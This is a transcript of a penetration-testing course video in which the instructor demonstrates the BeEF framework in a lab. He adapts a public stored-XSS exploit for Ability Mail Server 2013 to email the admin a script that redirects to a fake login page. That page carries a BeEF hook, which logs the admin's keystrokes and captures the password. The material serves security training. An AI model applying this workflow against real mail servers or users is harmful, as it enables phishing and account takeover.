BeEF Framework Demo
Video Activity
Join over 3 million cybersecurity professionals advancing their career
Sign up with
Required fields are marked with an *
or
Already have an account? Sign In »
Difficulty
Intermediate
Video Transcription
00:01
>> We have the BeEF framework up and running in our browser.
00:01
We've already launched it,
00:01
but let's follow our methodology.
00:01
We typically do our Nmap scan.
00:01
Let's say I have a host, I already have
00:01
some information that port 25 is open and I
00:01
want to figure out what the version is
00:01
of whatever software is running on port 25.
00:01
I can see its Code-Crafters
00:01
Ability Mail Server smtpd 2013.
00:01
We can do search exploit,
00:01
the Ability Mail Server 2013,
00:01
and we see that we have two exploits for
00:01
persistent cross-site scripting vulnerabilities
00:01
and there's a Python script here.
00:01
I can also go to that or search for that in Exploit DB.
00:01
This is what differentiates you from script kiddies,
00:01
is the fact that you can look at this script,
00:01
and his is what you need to do for OSEP,
00:01
and you need to start picking this apart.
00:01
I'm doing this early, because there's
00:01
a public exploit module,
00:01
but let's start thinking about this now.
00:01
I see a hard-coded IP;
00:01
I need to change that,
00:01
I see port 25;
00:01
that's good. We already have port 25.
00:01
I see an email address of user@hack.local,
00:01
is that going to be the same for
00:01
our environment? Start thinking about it.
00:01
You don't have to know Python per se,
00:01
but you should understand
00:01
the underlying code and be able to
00:01
modify the code, which is what I did.
00:01
I took a look at the code and I said,
00:01
"I need to change this to fit my
00:01
environment." Let me show you my code.
00:01
What I did is I modified the code.
00:01
What I did is I
00:01
know that there's a user@localhost
00:01
and there's an admin@localhost.
00:01
My objective is to get the username and
00:01
password of the admin user.
00:01
You can see here that the content type is text HTML,
00:01
which is important because it
00:01
will do our script tag here.
00:01
Script document location,
00:01
I'll show you that in the slides,
00:01
is my controlled server
00:01
192.168.1.228 in this index page,
00:01
so it should redirect the victim to our control page.
00:01
It's going to look a lot like
00:01
the login page for this application.
00:01
Here is the victim's IP address, port 25.
00:01
The login is user@localhost.
00:01
I already have this information,
00:01
their password is user,
00:01
and I'm sending it from user to admin.
00:01
Let's launch this and give it a go and see what happens.
00:01
Here we go. I'm launching this.
00:01
Here's my admin. He's going to log in or
00:01
she and they're going
00:01
to go to inbox.
00:01
They see they have a message and it says,
00:01
"Urgent, please read."
00:01
Well, they got to read it.
00:01
They click and it says, "You've been logged out.
00:01
Please log back in." Okay, well,
00:01
there are my credentials again, click "Login".
00:01
Something's not working here.
00:01
Let's go back and then I'll know what's going on.
00:01
If we go back,
00:01
let's take a look at
00:01
BeEF and we see we've hooked their browser here.
00:01
Internet Explorer. Wow, they're old school.
00:01
This isn't the old-school box, the XP.
00:01
But we have a whole bunch of information here.
00:01
Let's look at logs,
00:01
and you can see here
00:01
that there's a whole bunch of information.
00:01
It captures all the keystrokes on the page.
00:01
You can see that the user is admin
00:01
and the password is password12345.
00:01
If I wanted to,
00:01
I could then go in port 8000,
00:01
and now I can log in as the admin.
00:01
There we go. I could also do
00:01
some other things like if you
00:01
really like the big scary one
00:01
that I showed you before, create alert dialog.
00:01
Just in case you want to give it a try.
00:01
Let's see if that executes, there you go.
00:01
Message from webpage1.
00:01
I hope you see that BeEF is much more
00:01
impactful on what you can do.
00:01
There's a bunch of other things you can do here,
00:01
but for my purposes as the attacker,
00:01
I have what I came for.
00:01
I came for the username and password, and I got it.
00:01
Play around with BeEF,
00:01
see if you like it.
00:01
Again, it's a client-side attack
00:01
so you need someone to click
00:01
on the link and execute it.
00:01
What I also want to show you was if we're here,
00:01
if we view the source of the page,
00:01
I should see,
00:01
here it is; the script tag that I made on my evil page.
00:01
I made it look like the login for this application,
00:01
but buried in all this script or
00:01
all this HTML is
00:01
this script tag for my BeEF hook right there.
00:01
Sure a savvy victim will be able to see that,
00:01
but it's too late for them.
00:01
But that's how I made that page.
00:01
Hopefully, that makes sense, but again,
00:01
remember methodology, scan, enumerate,
00:01
figure out the version.
00:01
Ultimately from that, look at
00:01
public exploit code and modify it to fit
00:01
your environment and then
00:01
grab the username and password of the victim.
Up Next
File Inclusion Vulnerabilities
File Inclusion Demo
File Upload Vulnerabilities
XXE Attacks
Content Management Systems
Instructed By
Similar Content
